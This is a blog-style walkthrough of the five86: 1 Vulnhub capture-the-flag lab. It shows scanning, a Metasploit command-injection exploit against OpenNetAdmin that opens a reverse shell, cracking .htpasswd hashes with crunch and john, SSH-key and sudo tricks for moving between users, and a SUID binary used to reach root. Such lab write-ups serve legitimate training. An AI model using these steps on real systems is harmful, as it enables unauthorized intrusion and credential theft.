five86 1 walkthrough vulnhub ctf

five86: 1 Walkthrough Vulnhub CTF

Today we are solving five86: 1 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 1 walkthrough

Download here five86: 1

Network Scanning

our first step is to identify the target IP address we will initiate with netdiscover.

netdiscover

Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http, 10000 Webmin httpd service is running

nmap -A 192.168.1.7

Enumeration

enumerating port 80 http service we open the IP address in the web browser

we see the /ona directory look like openNetAdmin service is running I go to about page and we see the openNetAdmin version.

http://192.168.1.7/ona

we go to exploit-db and search openNetAdmin v18.1.1 and I found a command injection exploit now I download the exploit our local system

adding exploit msfconsole copy our exploit Download directory to Metasploit directory

cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/

msfconsole

use exploit/47772

set rhosts 192.168.1.7

set lhost 192.168.1.4

run

our session 1 is open and we got a reverse connection target machine

The shell it gave was not proper so to fix that we run the Python One-Liner. As this machine was loaded with the Python3, we need to use the Python3 variant of the One-Liner. for proper shell

shell

python -c 'import pty;pty.spawn("/bin/bash")'

id

ls -lsa command to check all hidden file and directory and I open .htpasswd file

ls -lsa

cat .htpasswd

Privilege Escalation

cat hash

Creating a wordlist using crunch and length is 10 and use target password character

crunch 10 10 aefhrt >word.txt

Try to crack the hash file with john using our custom wordlist

john --wordlist=word.txt hash

our hashes are crack now changing our shell www-data to user douglas and successfully login with douglas account.

su douglas

run sudo -l to check for commands that can run as sudo. It looks like dpkg can run as sudo.

sudo -l

Generating an ssh key for our second user

ssh-keygen -b 2048

I copying this key target machine /tmp directory and changing name authorized_keys

cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

After Creating key now changing the permission this file and copy our second user jen /home/jen/.ssh directory

cd /tmp

chmod 777 authorized_keys

sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

Try to connecting ssh connection without any password and us successfully login with Jen user

ssh [email protected]

After try many directory enumeration I found a mail massage

cd /var/mail

ls

cat jen

changing user Jen to the moss with the password found in the mail message

su moss

find /home -type f -perm -u=s 2>/dev/null

cd /home/moss/.games/

./upyourgame

cd /root

cat flag.txt

EnuBox Mattermost Walkthrough Vulnhub CTF